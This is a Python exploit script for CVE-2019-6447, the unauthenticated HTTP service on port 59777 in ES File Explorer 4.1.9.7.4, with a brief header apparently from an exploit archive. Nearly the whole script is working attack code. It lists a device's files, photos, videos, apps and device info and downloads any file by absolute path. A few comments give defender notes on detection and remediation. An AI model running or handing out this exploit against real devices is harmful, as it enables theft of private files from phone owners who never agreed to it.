影响版本
Version: ES File Explorer v4.1.9.7.4
EXP
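# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
#
# What this listing demonstrates: the script talks to an HTTP service on
# TCP port 59777 of the device. Listing commands are sent as a JSON body
# {"command": <name>} in a POST, and a file is fetched with a plain GET of its
# absolute path. No credential or token is sent at any point, so the service
# answers any host that can reach the port.
#
# Defender notes: a device exposing a listener on TCP 59777 is the indicator
# to look for in an asset inventory or network scan of your own estate; HTTP
# POSTs to that port whose JSON body carries a "command" field, and GETs for
# absolute filesystem paths, are the traffic pattern to alert on. Remediation
# is to update or remove the affected app version named in the header above.

import requests
import json
import ast
import sys

# Seconds to wait for the device before giving up, so an unreachable host
# does not hang the script.
TIMEOUT = 10

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> file to download")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = [
    'listFiles', 'listPics', 'listVideos', 'listAudios', 'listApps',
    'listAppsSystem', 'listAppsPhone', 'listAppsSdcard', 'listAppsAll',
    'getFile', 'getDeviceInfo',
]
# The first nine commands all return a list of records and share one printer.
listCmds = cmds[:9]

if cmd not in cmds:
    print("- WRONG COMMAND!")
    print("Available commands : ")
    print(" listFiles : List all Files.")
    print(" listPics : List all Pictures.")
    print(" listVideos : List all videos.")
    print(" listAudios : List all audios.")
    print(" listApps : List Applications installed.")
    print(" listAppsSystem : List System apps.")
    print(" listAppsPhone : List Communication related apps.")
    print(" listAppsSdcard : List apps on the SDCard.")
    print(" listAppsAll : List all Application.")
    print(" getFile : Download a file.")
    print(" getDeviceInfo : Get device info.")
    sys.exit(1)

print("\n==================================================================")
print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")
print("| Coded By : Nehal a.k.a PwnerSec |")
print("==================================================================\n")

header = {"Content-Type": "application/json"}


def httpPost(cmd):
    """POST one command name to the service and return the parsed reply.

    The reply body is parsed with ast.literal_eval, which evaluates Python
    literals only and does not execute code, but it is still data from the
    remote device: a malformed body raises ValueError or SyntaxError.
    """
    data = json.dumps({"command": cmd})
    response = requests.post(url, headers=header, data=data, timeout=TIMEOUT)
    # Fail on an HTTP error instead of trying to parse an error page.
    response.raise_for_status()
    # NOTE(review): presumably the reply is not strict JSON, which would
    # explain literal_eval instead of response.json() -- confirm.
    return ast.literal_eval(response.text)


def parse(text, keys):
    """Print every record in `text` as `key : value` lines, one blank line apart."""
    for dic in text:
        for key in keys:
            print(f"{key} : {dic[key]}")
        print('')


def do_listing(cmd):
    """Run a list-type command and print each returned record.

    The field names are taken from the first record; an empty reply prints
    nothing.
    """
    response = httpPost(cmd)
    keys = list(response[0].keys()) if response else []
    parse(response, keys)


if cmd in listCmds:
    do_listing(cmd)

elif cmd == cmds[9]:
    # getFile needs exactly one extra argument: the absolute path to read.
    if len(sys.argv) != 4:
        print("+ Include file name to download.")
        sys.exit(1)
    # startswith() also covers an empty argument, which indexing [0] would
    # turn into an IndexError.
    elif not sys.argv[3].startswith('/'):
        print("- You need to provide full path of the file.")
        sys.exit(1)
    else:
        path = sys.argv[3]
        print("+ Downloading file...")
        response = requests.get(url + path, timeout=TIMEOUT)
        # Without this check an HTTP error body would be saved as if it were
        # the requested file.
        response.raise_for_status()
        with open('out.dat', 'wb') as wf:
            wf.write(response.content)
        print("+ Done. Saved as `out.dat`.")

elif cmd == cmds[10]:
    # getDeviceInfo returns a single mapping rather than a list of records.
    response = httpPost(cmd)
    for key in response.keys():
        print(f"{key} : {response[key]}")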